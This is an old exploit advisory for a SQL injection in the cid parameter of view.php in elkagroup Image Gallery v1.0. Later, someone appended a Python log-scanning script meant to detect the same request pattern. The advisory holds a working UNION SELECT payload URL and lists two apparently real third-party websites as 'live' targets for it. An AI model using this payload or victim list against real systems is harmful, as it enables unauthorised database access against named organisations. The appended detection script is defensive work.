-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
elkagroup Image Gallery v1.0 (view.php cid) Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script: Image Gallery v1.0
[~] Language: PHP
[~] Website: http://www.elkagroup.com
[~] Affected File: view.php
[~] Type: Commercial
[~] Report-Date: 28/10/2008

--[ DoRK ]--

No more d0rks sry k!dz...

--[ Founder ]--

G4N0K

--[ Exploit ]--

[~] http://localhost/[path]/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0

--[ L!ve ]--

http://www.abfa-esfahan.com/gallery/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0
http://gallery.iraninsurance.ir/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0

--[ Greetz ]--

[~] ALLAH
[~] Tornado2800
[~] Hussain-X

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
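
A detection check for the request shape shown in the exploit URL above, added here as an example and not part of the original advisory: it flags access-log requests to view.php whose cid, uid or new parameter is not a plain non-negative integer after URL decoding. Treating all three parameters as integers, the combined log format, and the sample lines (constructed, using documentation IP ranges) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory's request passes to view.php. Treating all three as
# non-negative integers is an assumption drawn from the values in that request.
NUMERIC_PARAMS = ("cid", "uid", "new")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(request_target):
    """Return {param: decoded value} for view.php parameters that are not plain integers."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/view.php"):
        return {}
    # parse_qs percent-decodes values, so %20UNION%20 is inspected as " UNION ".
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if not re.fullmatch(r"\d+", value.strip()):
                bad[name] = value
    return bad


def scan(log_lines):
    """Yield (client_ip, offending_params) for each flagged access-log line."""
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_params(match.group(1))
        if bad:
            yield line.split(" ", 1)[0], bad


# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2008:10:01:02 +0000] "GET /gallery/view.php?cid=3&uid=0&new=0 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Oct/2008:10:01:09 +0000] "GET /gallery/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0 HTTP/1.1" 200 4981',
    '203.0.113.5 - - [28/Oct/2008:10:02:30 +0000] "GET /gallery/index.php?cid=abc HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(ip, bad)
```

The same integer-only rule is what the application itself should enforce on cid before it reaches the query, ideally together with a parameterized statement.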